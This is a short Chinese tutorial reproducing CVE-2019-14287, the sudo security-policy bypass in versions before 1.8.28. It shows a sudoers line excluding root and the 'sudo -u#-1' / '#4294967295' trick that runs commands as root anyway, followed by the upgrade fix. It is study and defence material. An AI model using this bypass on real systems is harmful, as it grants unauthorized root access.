（该文参考网络他人资料，仅为学习，不许用于非法用途）

一、环境

　　1、sudo版本小于1.8.28的Linux系统

　　2、sudo 是Linux系统命令，让普通账号以root身份去执行某些命令，比如：安装软件、查看某些配置文件、关机、重启等操作、如果普通用户需要使用sudo，需要将修改配置文件/etc/sudoers，将sudo使用权赋予该账号

　　sudo 提权漏洞是一个安全策略绕过问题，去执行某些敏感的命令，CVE编号是CVE-2019-14287，影响版本小于1.8.28

二、漏洞复现过程

　　Step1：查看版本

    sudo -V    

　　Step2：修改配置文件

    vim /etc/sudoers

　　　　在root ALL=(ALL:ALL) ALL   下面添加一行配置：test ALL=(ALL,!root) ALL

　　　　注意：需创建test用户：useradd test   passwd test ，修改完配置文件保存退出：:wq!

　　　　　　rest   表示test用户

　　　　　　第一个ALL   表示用户可以在任意地方使用sudo

　　　　　　第二个(ALL,!root)   表示命令可以被除了root以外的任意用户执行

　　　　　　最后面的ALL   表示被允许执行

　　　　　　整体： test用户可以使用sudo，但是除了root以外的任意用户去执行命令

　　Step：切换到test用户　　

    su test
　　sudo id（查看root的id）

　　　　发现没有权限去执行

　　　　使用如下方法执行我们想要执行的命令

　　　　　　sudo -u# 数字 命令

　　　　　　其中数字范围：-1~4294967295，命令是系统命令

　　　　如果以root身份去执行命令，数字使用-1和4294967295

三、修复方法

　　更新sudo版本大于等于1.8.28

四、总结

　　该漏洞比较鸡肋，需要管理员修改配置文件。